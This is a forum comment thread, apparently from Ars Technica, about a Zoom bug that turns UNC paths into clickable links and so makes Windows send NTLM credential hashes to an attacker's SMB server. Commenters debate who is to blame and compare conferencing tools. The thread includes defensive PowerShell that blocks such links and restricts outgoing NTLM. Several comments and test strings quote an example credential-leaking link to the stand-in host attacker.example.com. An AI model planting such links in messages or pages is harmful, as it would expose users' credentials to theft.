Unpatched Zoom bug lets attackers steal Windows credentials with no warning

SmokeTest

Ars Praefectus
3,294
Subscriptor
The events of the past month have left millions of people working from home without the same levels of IT and security support they get when working on premises. That makes it more likely that port 445 is open, either because of an oversight or because the port is needed to connect to enterprise resources.
...or because you're using SMB to make your 40TB media collection available on your local network.
 
Upvote
6 (6 / 0)

Got Nate?

Ars Scholae Palatinae
1,445
Sorry, I understand the problem, but I don't understand the fix. Is Zoom sending credentials when it doesn't have to? Or is Windows Explorer sending credentials whenever you click one of these links?
It's Zoom that tells Windows to open the link. Windows sends the credentials to log in.

Zoom should not be linking these in the first place. That would be the easiest and fastest fix. Maybe someone can explain because I'm uncertain why Zoom even allows linking Windows paths?

But maybe Windows should always ask before connecting to a new (unknown) server. Mind you it can be hard to stop people automatically clicking "allow".

Ultimately the fix is that NTLM is completely removed. Microsoft strongly recommends against its use but it's needed for compatibility with older services.

What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.
No, this is definitely on Zoom. When an application tells Windows that a user wants to open a given link, it has to open. The problem is that Zoom is creating links based on data from untrustworthy sources. Compare that to what happens if your email client gets a suspect mail and disables links in the message so that users cannot accidentally click on them.

Ok, I'll make that comparison. I still blame Windows. Just like Zoom, it shouldn't be up to the email software to protect the user from their own OS.*

The reason everyone is attacking zoom over this now is because they now have an established history of poor security decisions. It's just more piling on. Also, fuck zoom.

*E: To continue the thought: It should be the OS protecting the user from malicious links, not leaking credentials in the first place. NTLM has been deprecated for 2 decades. There is no reason for it to be enabled by default in this day and age.
 
Upvote
11 (17 / -6)

jhodge

Ars Tribunus Angusticlavius
8,746
Subscriptor++
This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths into clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.
 
Upvote
23 (27 / -4)

karoc

Ars Scholae Palatinae
1,244
Subscriptor++
PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

Teams? Am I missing something?
 
Upvote
2 (3 / -1)

Danathar

Ars Praefectus
4,573
Subscriptor
Zoom is the whipping boy because they became top dog quickly. Most of these bugs are zoom prioritizing usability (which is why they are on top) over thorough security. Their security isn't terrible, but isn't great either.

Honestly, this should be good for them, they get to be inspected by a microscope and if they take measures to address what people bring up it will be a good thing for them.

Beware of clickbait "ZOMG!! ZOOM IS STEALING ALL YOUR DATA" stories though. Pays to dig and find out exactly what the issues are and what you can do (if anything) to mitigate them.
 
Upvote
13 (15 / -2)

Oak

Ars Tribunus Militum
2,572
Subscriptor++
universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?
 
Upvote
1 (3 / -2)

xeoph

Ars Scholae Palatinae
1,172
I've used zoom when needing enterprise support on a firewall for a couple years now. We liked it so much we started using it for support as well.

Compared to other products it has similar features, costs less and works more reliably.

Zoom has gotten a lot of attention and a lot more testing here recently so it would only be expected that we find all of these problems. Ultimately it's a good thing as long as they actively participate in resolving the issues.

EVERY other meeting/remote support software has had many exploits over time. So often it's a quick headline, we update software and it's done. Gotomeeting, Webex and I'm sure actually every other option have all had remote control exploits via browser plugins and other various goofs. I think it's great that we fix Zoom as a group but not so great that we act like this is a one company problem. IT Security is too lax everywhere, not just in one product!
 
Upvote
5 (10 / -5)

arsgiles

Ars Centurion
221
Subscriptor
I've used zoom when needing enterprise support on a firewall for a couple years now. We liked it so much we started using it for support as well.

Compared to other products it has similar features, costs less and works more reliably.

Zoom has gotten a lot of attention and a lot more testing here recently so it would only be expected that we find all of these problems. Ultimately it's a good thing as long as they actively participate in resolving the issues.

EVERY other meeting/remote support software has had many exploits over time. So often it's a quick headline, we update software and it's done. Gotomeeting, Webex and I'm sure actually every other option have all had remote control exploits via browser plugins and other various goofs. I think it's great that we fix Zoom as a group but not so great that we act like this is a one company problem. IT Security is too lax everywhere, not just in one product!

I agree. We are a high tech company with lots of smart people and we have used just about every conferencing tool out there. Zoom (or skins of Zoom like RingCentral) "just works" with our guys and more importantly with our suppliers and customers. And our IT department hasn't had heartburn about the exploits (due to the nature of our business they are all over this).
 
Upvote
1 (5 / -4)
So, we are using Group FaceTime as option 1 for family.

Tested Zoom...uh, no. 84 y/o MIL and other older relatives just hated it. Security even bigger concern for them; they’ll click all the random shit they see.

Option 3, WebEx. Yes, it’s a work asset, so last choice, but if we’re in for 3-4 MONTHS, that may be what we can use.

As for work, it’s been 98% WebEx, 1.99% Skype, and one horror movie called TEAMS!

YMMV, WAC, WSL.
 
Upvote
0 (2 / -2)
I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.
 
Upvote
4 (4 / 0)
I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.
My only experience is Signal is pretty poor, compared to Skype, WhatsApp or Duo. But it works. They need to let you be able to move video windows better.
 
Upvote
-1 (0 / -1)

ChrisSD

Ars Tribunus Angusticlavius
6,188
universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?
The Windows API converts forwards slashes to backslashes by default. It doesn't really matter what the share name is.
 
Upvote
5 (6 / -1)
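Because the Windows path APIs accept either slash style, a chat client that wants to stop turning UNC paths into clickable links has to catch both spellings. The function below is an added example written for this thread, not Zoom's code: it only makes http and https text clickable and reports anything that would resolve to an SMB server as inert text. The sample messages are constructed for the example.

```powershell
# Added example, not Zoom's code: linkify chat text without ever producing a
# clickable UNC path. Only http(s) URLs become links; tokens that Windows
# would hand to the SMB client are reported and left as plain text.

function Test-UncLike {
    param([string] $Token)
    # \\host\share, //host/share and \\?\UNC\host\share all normalize to a
    # backslash UNC path once Windows sees them; file: URLs with a host
    # reach the same place. Treat all of them alike.
    $normalized = $Token -replace '/', '\'
    return ($normalized -match '^\\\\[^\\]+' -or $Token -match '^file:')
}

function ConvertTo-SafeLinks {
    param([string] $Message)
    $links    = New-Object System.Collections.Generic.List[string]
    $rejected = New-Object System.Collections.Generic.List[string]
    foreach ($token in ($Message -split '\s+')) {
        if ($token -match '^https?://[^\s<>"]+$') {
            $links.Add($token)            # allow-listed scheme: safe to linkify
        } elseif (Test-UncLike $token) {
            $rejected.Add($token)         # would trigger an SMB connection: never linkify
        }
    }
    [pscustomobject]@{ Message = $Message; Links = $links; RejectedUncPaths = $rejected }
}

# Constructed sample messages for this example.
$samples = @(
    'Slides are at https://intranet.example/deck.pptx',
    'Recording is on \\attacker.example.com\C$ if you want it',
    'Or //attacker.example.com/C$ works too',
    'See file://attacker.example.com/share/doc.docx'
)
foreach ($s in $samples) { ConvertTo-SafeLinks $s }
```

Only the first sample yields a link; the other three land in RejectedUncPaths, including the forward-slash variant that looks harmless to a regex written for backslashes only. The design choice is an allow-list of schemes rather than a deny-list of path shapes, so new ways of spelling a UNC path do not need to be anticipated.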

bagok

Ars Centurion
378
Subscriptor++
Cisco has been working on enterprise collaboration software for years, all the while letting WebEx rot as "old tech". And now their milkshake gets taken by a new meetings space phenom. No wonder their stock was tanking before the market took a plunge.

Full disclosure: Some minuscule part of the failure is mine as I worked on these products. I was invited to leave for productivity reasons. Perhaps the invitations didn't reach high enough into management as they should have.
 
Upvote
8 (8 / 0)

GlockenspielHero

Ars Scholae Palatinae
709
Subscriptor
And April's off to a great start.

I don't see how Zoom got so much good faith in the past few weeks after their last little security shitstorm with the hidden web server.

Because it actually works. I managed to get 300+ faculty who had never done any form of distance ed online in a week. We built a special helpdesk to handle the flood of calls from our 2700 students that we were going to get Monday morning when they returned to virtual classes and got all of 20 calls, all of them related to hardware or rural internet failures.

We've tried a pile of others from WebEx to Realtimeboard on a few hybrid courses we run in the summer and all have fallen over under far smaller loads or been much harder to use.

Yes, we're going to have to go back with our faculty and start hardening some stuff that shouldn't have been left open, but leaving it open actually made it work and right now that's what we needed.
 
Upvote
12 (13 / -1)

dangoodin

Ars Tribunus Militum
1,653
Ars Staff
universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

Apologies. That was a typo on my part. I have updated to change it to \\attacker.example.com/C$
 
Upvote
-2 (3 / -5)

ChrisSD

Ars Tribunus Angusticlavius
6,188
universal naming convention strings—such as //attacker.example.com/C$

Why forward slashes and the (hidden-administrative-share-indicating) dollar sign in the example? UNC paths standardly use backslashes, and the malicious link thing here doesn't generally require a dollar sign.

Does Zoom on Windows allow links to be interpreted as UNC paths even with forward slashes?

Apologies. That was a typo on my part. I have updated to change it to \\attacker.example.com/C$
In that case you'll also want to change the `/C$` to `\C$` for the sake of consistency.
 
Upvote
9 (9 / 0)
What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.
It doesn't send the credentials to Zoom. What happens is:

1. Zoom asks Windows to open the link "\\attacker.example.com\C$".

2. Windows dutifully connects to "attacker.example.com" and attempts to login.

And for the folks wondering why they might linkify those, well... because it's useful. Otherwise, people need to copy the link and paste it into Run or Explorer directly. Outlook lets you do the same thing.

Yeah, NTLM authentication isn't ideal, but that's not really the fault of the folks that made the filepath clickable.
For better or worse, in Windows, today, it's up to the user to not make an SMB connection to an untrusted server. When you connect to an SMB server, the server's going to get a hashed copy of your creds.

If you don't want to send outgoing NTLM auths, there's a security policy for that: Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers (Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options)

The policy allows you to block all outgoing NTLM auth attempts, or to provide a list of allowed servers.
 
Upvote
16 (17 / -1)
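The policy named in the post above, as an added example that is not part of the thread: the script audits outgoing NTLM first and only then denies it, because a host that still relies on NTLM for a NAS or an IP-addressed share will lose access the moment the policy is set to deny. The registry values are the documented backing store for the "Restrict NTLM: Outgoing NTLM traffic to remote servers" and "Add remote server exceptions for NTLM authentication" policies; the server names in the exception list are placeholders, and event 8001 is assumed to be the outgoing-client audit event in the NTLM operational log.

```powershell
# Added example (not from the thread): audit, then restrict, outgoing NTLM via
# the registry values behind the policy
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".
#   RestrictSendingNTLMTraffic  0 = Allow all, 1 = Audit all, 2 = Deny all
#   ClientAllowedNTLMServers    multi-string exception list
# Run from an elevated prompt. On a domain-joined machine a GPO carrying this
# policy overwrites whatever is set here, so set it in the GPO instead.

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$ModeNames = @{ 0 = 'Allow all'; 1 = 'Audit all'; 2 = 'Deny all' }

function Get-OutgoingNtlmPolicy {
    $p = Get-ItemProperty -Path $LsaKey
    # A missing value means the default, which is "Allow all".
    $mode = if ($null -eq $p.RestrictSendingNTLMTraffic) { 0 } else { [int]$p.RestrictSendingNTLMTraffic }
    $allowed = if ($null -eq $p.ClientAllowedNTLMServers) { @() } else { @($p.ClientAllowedNTLMServers) }
    [pscustomobject]@{ Mode = $ModeNames[$mode]; AllowedServers = $allowed }
}

function Set-OutgoingNtlmPolicy {
    param(
        [Parameter(Mandatory)] [ValidateSet('Allow', 'Audit', 'Deny')] [string] $Mode,
        [string[]] $AllowedServers
    )
    $value = @{ Allow = 0; Audit = 1; Deny = 2 }[$Mode]
    Set-ItemProperty -Path $LsaKey -Name RestrictSendingNTLMTraffic -Value $value -Type DWord
    if ($AllowedServers) {
        Set-ItemProperty -Path $LsaKey -Name ClientAllowedNTLMServers -Value $AllowedServers -Type MultiString
    }
}

# Step 1: audit only. Nothing is blocked yet; domain file servers normally use
# Kerberos and are unaffected, but anything reached by IP address or outside
# the domain will show up in the audit log.
Set-OutgoingNtlmPolicy -Mode Audit
Get-OutgoingNtlmPolicy

# Step 2: after some days of normal use, list what the policy would have
# blocked (event 8001, outgoing NTLM audit, assumed ID for this example).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message

# Step 3: deny everything except the servers that legitimately need NTLM.
# 'nas01.corp.example' and '*.corp.example' are placeholder names.
Set-OutgoingNtlmPolicy -Mode Deny -AllowedServers 'nas01.corp.example', '*.corp.example'
Get-OutgoingNtlmPolicy
```

Once the mode is "Deny all", a click on a link such as \\attacker.example.com\C$ still makes Windows open an SMB connection to the attacker's host, but the client refuses to send an NTLM response to a server that is not on the exception list, so the connection fails and nothing usable for cracking or relaying leaves the machine. Blocking outbound TCP 445 to non-local addresses on the host firewall is the usual complement: it stops the connection itself rather than only the authentication.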

TheArsTrev

Ars Scholae Palatinae
925
And April's off to a great start.

I don't see how Zoom got so much good faith in the past few weeks after their last little security shitstorm with the hidden web server.

In my circles, it's all the non-techie moms and pops that are downloading and using this crap...they didn't understand why I was refusing to join in. le sigh.
 
Upvote
-7 (1 / -8)

TheArsTrev

Ars Scholae Palatinae
925
PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

Teams? Am I missing something?

8 or less people? Duo.
 
Upvote
0 (0 / 0)
Zoom may not actually be malicious, but they clearly place security and privacy way, way behind making the experience quick & easy for the user.

That's pretty much why IT hates BYOD and 'shadow IT' in a nutshell.

It's not (just*) because we hate all users and want everything locked down and beige; it's because it is substantially easier to deliver a pleasant, easy to use, fast to roll out product if you ignore a variety of important but minimally visible and very unsexy things (it's also more likely if you are lean and hungry, rather than primarily rolling out new features based on how well they mesh with your existing product line; admittedly); which makes it virtually certain that, if you pick solutions by individual enthusiasm, you will end up with some ugly gaps to deal with.

Especially if you have regulatory or contractual requirements to, say, keep some data from bleeding out all over the place, or enforce retention policies (either in the 'backup' or the 'destroy after X date' sense).

It's also loads of fun if multiple products are selected by ad-hoc popular adoption without anyone to be the "but how does it SSO with our system of choice?" guy. Then you get to also play pick-the-password-manager to paper over that problem. Fun times!
 
Upvote
6 (6 / 0)

necrosis

Ars Scholae Palatinae
1,130
What I don't understand is why Windows would send the credentials to Zoom, rather than just open the path in Explorer. This sounds like a Windows problem more than a Zoom problem.
It doesn't send the credentials to Zoom. What happens is:

1. Zoom asks Windows to open the link "\\attacker.example.com\C$".

2. Windows dutifully connects to "attacker.example.com" and attempts to login.

And for the folks wondering why they might linkify those, well... because it's useful. Otherwise, people need to copy the link and paste it into Run or Explorer directly. Outlook lets you do the same thing.

Yeah, NTLM authentication isn't ideal, but that's not really the fault of the folks that made the filepath clickable.
For better or worse, in Windows, today, it's up to the user to not make an SMB connection to an untrusted server. When you connect to an SMB server, the server's going to get a hashed copy of your creds.

If you don't want to send outgoing NTLM auths, there's a security policy for that: Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers (Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options)

The policy allows you to block all outgoing NTLM auth attempts, or to provide a list of allowed servers.

What exactly happens when this is enabled? Does it just not auto send the current logged in users creds and popup a box to enter them?
 
Upvote
2 (2 / 0)

Taijian

Seniorius Lurkius
9
Subscriptor
PS. Would love to hear of a viable alternative.

Work has Skype for Business. It doesn't work because the VPN is being hammered at the moment and it was constantly dropping out. This has put people off using free Skype.

Hangouts has had endless problems for us in the past so, again, people are reluctant to use it now. Plus, Google. So, meh.

FaceTime isn't cross-platform so the handful of non-Mac users can't be included.

So, other than Zoom, what's cross-platform and cross device (desktop/tablet/phone) that works?

I'm just gonna throw Jitsi out there. It's FOSS, anyone can either set up their own server/service or just use one of the freely accessible ones out there. No registration required, can run in any (semi-modern) browser, Android/iOS-Apps exist...
Does, of course, require your in-house IT to be semi-literate, in case you want to roll with your own server.
 
Upvote
4 (4 / 0)

SeanJW

Ars Legatus Legionis
11,979
Subscriptor++
This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths in to clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.

It's an enterprise product being used all over the place - UNC links in an enterprise do have value.
 
Upvote
4 (5 / -1)
You don't need Zoom or anything like it for K-12.

My brother here in NY teaches in HS, and the students must access/download a lesson and other resources and do the work and submit back some material. If students need more, there is this thing called a phone.

According to my brother, things are going fine, and other teachers in the family at other districts and differing grade-levels are doing the same.

Yes, it is different and the teachers had to come up with things that would not require your typical lecture, but it is working and no one has opened themselves up to lesser security than the online resources that already existed.

Really, I guess if your school had nothing online these video conference classes could be a nice, temporary fallback, but having the lion's share of teachers do virtual classrooms with 20+ video feeds using some untested but "easy to use" software is lazy, dangerous and shortsighted. Of course, you could also just email stuff to parents and handle things that way.
 
Upvote
-13 (1 / -14)
I’ve had zoom forced on me in the last couple of months, along with 5 other teleconference platforms.

Zoom is the only one that has caused problems.

I've had the opposite. Out of Skype, Hangouts, and Zoom, Zoom has had the least issues (video, audio, freezing, etc...).

That's interesting - I haven't used Skype or Hangouts.

I've used MS Teams, Cisco WebEx, Signal, and HireVue for video conferencing. Some parts of my company use Slack as well. I haven't happened to need it recently, but was nice the last time I did. Zoom has worked OK, but has been a security nightmare. In terms of raw functionality in my experience, it's probably not as good as Teams or WebEx and better than the others.

HireVue probably had the lowest performance. Signal doesn't offer enterprise videoconference features like screen sharing since that's not its target market. WebEx and Teams seem to be the most robust of the lot. This crisis is the first time I've used Teams, and I have to say, I'm really impressed with it.
How's that everyone's experience differs so wildly with these products? One man's junk is another man's treasure, I suppose.
 
Upvote
2 (2 / 0)

phoenix_rizzen

Ars Praefectus
4,926
Subscriptor
You don't need Zoom or anything like it for K-12.

My brother here in NY teaches in HS, and the students must access/download a lesson and other resources and do the work and submit back some material. If students need more, there is this thing called a phone.

According to my brother, things are going fine, and other teachers in the family at other districts and differing grade-levels are doing the same.

Yes, it is different and the teachers had to come up with things that would not require your typical lecture, but it is working and no one has opened themselves up to lesser security than the online resources that already existed.

Really, I guess if your school had nothing online these video conference classes could be a nice, temporary fallback, but having the lion's share of teachers do virtual classrooms with 20+ video feeds using some untested but "easy to use" software is lazy, dangerous and shortsighted. Of course, you could also just email stuff to parents and handle things that way.

There's something to be said for actually seeing people's faces and interacting with them live. Especially for the earlier grades (elementary school). Not so much for actually teaching a course, but to keep up the interactions between the student and the teacher, and between students themselves.

Especially when you're stuck at home without any face-to-face interactions with those outside your immediate family.

Online courses aren't new (we have a whole virtual school devoted to just that). But students always had the opportunity to stop by a physical location and interact with the staff and students; or to go hang out with friends, or at the mall, or what not. That's not possible right now, so some kind of videoconferencing is needed to fill the gap.

At least in our district, Zoom isn't used for 1-to-many lectures, but more for 1-on-1 tutoring, weekly check-ins with students, and for keeping contact with staff and students. We use Moodle and Freshgrade for the actual online coursework.
 
Upvote
10 (10 / 0)
This is evidently a Microsoft Windows flaw.

It appears to be reported along the same lines as: the Tech Industry built insecure products, so let's train users to not click links.

Fix Windows so it doesn't send credentials to random SMB servers on the internet that bear no relation to the host's domain, and using an insecure protocol to boot.

Sheesh!

It's also a Zoom flaw. There is very little upside to turning UNC paths in to clickable links, and this risk is both clear and well-known. This is yet another risk/reward trade-off that Zoom has made in favor of 'more risk'.

I don't know how you can say that with a straight face.

Operating system leaks passwords. Zoom isn't putting users at risk doing a sensible thing, no matter how little upside it has for you. The beeping operating system is handling the situation in a callous and irresponsible manner.
 
Upvote
1 (2 / -1)
Something doesn't make sense here. IF this works, the hole is in Windows.

If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).

Now many, many users will get confused and supply their username and password at the login prompt. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in Windows. I can make links to file::\\attacker.example.com\c$ that will do the same on a web page.
 
Upvote
5 (5 / 0)

Ozy

Ars Tribunus Angusticlavius
7,467
Something doesn't make sense here. IF this works, the hole is in Windows.

If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).

Now many, many users will get confused and supply their username and password at the login prompt. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in Windows. I can make links to file::\\attacker.example.com\c$ that will do the same on a web page.

Pretty sure Windows tries to use your login credentials first to access a share, otherwise there's a whole lot of inconvenience to access anything on your LAN.
 
Upvote
7 (7 / 0)